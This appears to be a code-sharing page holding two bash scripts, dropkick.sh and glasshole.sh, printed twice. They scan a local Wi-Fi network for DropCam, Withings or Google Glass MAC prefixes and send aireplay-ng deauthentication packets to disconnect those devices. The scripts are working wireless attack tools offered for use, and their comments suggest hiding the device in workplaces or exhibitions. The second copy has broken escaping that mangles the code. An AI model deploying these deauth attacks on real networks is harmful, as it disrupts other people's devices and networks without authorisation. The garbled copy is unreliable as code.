couto · December 22, 2015 09:18
diff --git a/dropkick.sh b/dropkick.sh
 #!/bin/bash
 #
 # DROPKICK.SH 
 #
 # Detect and Disconnect the DropCam and Withings devices some people are using to
 # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
 #
 #   http://julianoliver.com/output/log_2014-05-30_20-52 
 #
 # This script was named by Adam Harvey (http://ahprojects.com), who also
 # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
 # etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
 # notification. Comment it out if you don't need it.
 #
 # See also http://plugunplug.net, for a plug-and-play device that does this
 # based on OpenWrt. Code here:
 #
 #   https://github.com/JulianOliver/CyborgUnplug
 # 
 # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
 #
 #   sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>

 shopt -s nocasematch # Set shell to ignore case
 shopt -s extglob # For non-interactive shell.

 readonly NIC=$1 # Your wireless NIC
 readonly BSSID=$2 # Network BSSID (AirBnB WiFi network)
 readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
 # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not
 # present.
 readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings 
 readonly POLL=30 # Check every 30 seconds
 readonly LOG=/var/log/dropkick.log

 airmon-ng stop mon0 # Pull down any lingering monitor devices
 airmon-ng start $NIC # Start a monitor device

 while true;
    do  
        for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
        '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
           do
               if [[ "$TARGET" == "$GGMAC" ]]
                   then
                       # Audio alert
                       beep -f 1000 -l 500 -n 200 -r 2
                       echo "WiFi camera discovered: "$TARGET >> $LOG
                       aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 
                       echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG
                       echo '
                             __              __    _     __          __                      
                         ___/ /______  ___  / /__ (_)___/ /_____ ___/ / 
                        / _  / __/ _ \/ _ \/   _// / __/   _/ -_) _  / 
                        \_,_/_/  \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/  
                                    /_/

                       '                                        
                    else
                        echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
               fi
           done
           echo "None found this round."
           sleep $POLL
 done
 airmon-ng stop mon0
diff --git a/glasshole.sh b/glasshole.sh
 #!/bin/bash
 #
 # GLASSHOLE.SH
 #
 # Find and kick Google Glass devices from your local wireless network.  Requires
 # 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host.  Put on a BeagleBone
 # black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N)
 # and wear it, hide it in your workplace or your exhibition.
 #
 # Save as glasshole.sh, 'chmod +x glasshole.sh' and exec as follows:
 #
 #   sudo ./glasshole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
 # 
 # Thanks to Jens Killus for new rev Glass MAC addr and extglob hint (phew).
 # Thanks to Tim Meusel for line pulling MAC from 'ip' rather than legacy 'ifconfig'

 shopt -s nocasematch # Set shell to ignore case
 shopt -s extglob # For non-interactive shell.

 NIC=$1 # Your wireless NIC
 BSSID=$2 # Network BSSID (exhibition, workplace, park)
 MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
 # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not present.
 GGMAC='@(F8:8F:CA:24*|F8:8F:CA:25*)' # Match against old and new Glass. 
 POLL=30 # Check every 30 seconds

 airmon-ng stop mon0 # Pull down any lingering monitor devices
 airmon-ng start $NIC # Start a monitor device

 echo '
   ___           _ __    __                     __             __        __   
  / _ \___  ___ ( ) /_  / /  ___   ___ _  ___ _/ /__ ____ ___ / /  ___  / /__ 
 / // / _ \/ _ \|/ __/ / _ \/ -_) / _ `/ / _ `/ / _ `(_-<(_-</ _ \/ _ \/ / -_)
 /____/\___/_//_/ \__/ /_.__/\__/  \_,_/  \_, /_/\_,_/___/___/_//_/\___/_/\__/ 
                                        /___/                                 
 '

 while true;
    do  
        for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
        '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
           do
               if [[ $TARGET == $GGMAC ]]
                   then
                       # Audio alert
                       beep -f 1000 -l 500 -n 200 -r 2
                       echo "Glasshole discovered: "$TARGET
                       echo "De-authing..."
                       aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 
                    else
                        echo $TARGET": is not a Google Glass. Leaving alone.."
               fi
           done
           echo "None found this round."
           sleep $POLL
 done
 airmon-ng stop mon0
	#!/bin/bash
	#
	# DROPKICK.SH
	#
	# Detect and Disconnect the DropCam and Withings devices some people are using to
	# spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
	#
	# http://julianoliver.com/output/log_2014-05-30_20-52
	#
	# This script was named by Adam Harvey (http://ahprojects.com), who also
	# encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
	# etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
	# notification. Comment it out if you don't need it.
	#
	# See also http://plugunplug.net, for a plug-and-play device that does this
	# based on OpenWrt. Code here:
	#
	# https://github.com/JulianOliver/CyborgUnplug
	#
	# Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
	#
	# sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>

	shopt -s nocasematch # Set shell to ignore case
	shopt -s extglob # For non-interactive shell.

	readonly NIC=$1 # Your wireless NIC
	readonly BSSID=$2 # Network BSSID (AirBnB WiFi network)
	readonly MAC=$(/sbin/ifconfig \| grep $NIC \| head -n 1 \| awk '{ print $5 }')
	# MAC=$(ip link show "$NIC" \| awk '/ether/ {print $2}') # If 'ifconfig' not
	# present.
	readonly GGMAC='@(30:8C:FB\|00:24:E4)' # Match against DropCam and Withings
	readonly POLL=30 # Check every 30 seconds
	readonly LOG=/var/log/dropkick.log

	airmon-ng stop mon0 # Pull down any lingering monitor devices
	airmon-ng start $NIC # Start a monitor device

	while true;
	do
	for TARGET in $(arp-scan -I $NIC --localnet \| grep -o -E \
	'([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
	do
	if [[ "$TARGET" == "$GGMAC" ]]
	then
	# Audio alert
	beep -f 1000 -l 500 -n 200 -r 2
	echo "WiFi camera discovered: "$TARGET >> $LOG
	aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
	echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG
	echo '
	__ __ _ __ __
	___/ /______ ___ / /__ (_)___/ /_____ ___/ /
	/ _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ /
	\_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/
	/_/

	'
	else
	echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
	fi
	done
	echo "None found this round."
	sleep $POLL
	done
	airmon-ng stop mon0
	#!/bin/bash
	#
	# GLASSHOLE.SH
	#
	# Find and kick Google Glass devices from your local wireless network. Requires
	# 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host. Put on a BeagleBone
	# black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N)
	# and wear it, hide it in your workplace or your exhibition.
	#
	# Save as glasshole.sh, 'chmod +x glasshole.sh' and exec as follows:
	#
	# sudo ./glasshole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
	#
	# Thanks to Jens Killus for new rev Glass MAC addr and extglob hint (phew).
	# Thanks to Tim Meusel for line pulling MAC from 'ip' rather than legacy 'ifconfig'

	shopt -s nocasematch # Set shell to ignore case
	shopt -s extglob # For non-interactive shell.

	NIC=$1 # Your wireless NIC
	BSSID=$2 # Network BSSID (exhibition, workplace, park)
	MAC=$(/sbin/ifconfig \| grep $NIC \| head -n 1 \| awk '{ print $5 }')
	# MAC=$(ip link show "$NIC" \| awk '/ether/ {print $2}') # If 'ifconfig' not present.
	GGMAC='@(F8:8F:CA:24\|F8:8F:CA:25)' # Match against old and new Glass.
	POLL=30 # Check every 30 seconds

	airmon-ng stop mon0 # Pull down any lingering monitor devices
	airmon-ng start $NIC # Start a monitor device

	echo '
	___ _ __ __ __ __ __
	/ _ \___ ___ ( ) /_ / / ___ ___ _ ___ _/ /__ ____ ___ / / ___ / /__
	/ // / _ \/ _ \\|/ __/ / _ \/ -_) / _ `/ / _ `/ / _ `(_-<(_-</ _ \/ _ \/ / -_)
	/____/\___/_//_/ \__/ /_.__/\__/ \_,_/ \_, /_/\_,_/___/___/_//_/\___/_/\__/
	/___/
	'

	while true;
	do
	for TARGET in $(arp-scan -I $NIC --localnet \| grep -o -E \
	'([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
	do
	if [[ $TARGET == $GGMAC ]]
	then
	# Audio alert
	beep -f 1000 -l 500 -n 200 -r 2
	echo "Glasshole discovered: "$TARGET
	echo "De-authing..."
	aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
	else
	echo $TARGET": is not a Google Glass. Leaving alone.."
	fi
	done
	echo "None found this round."
	sleep $POLL
	done
	airmon-ng stop mon0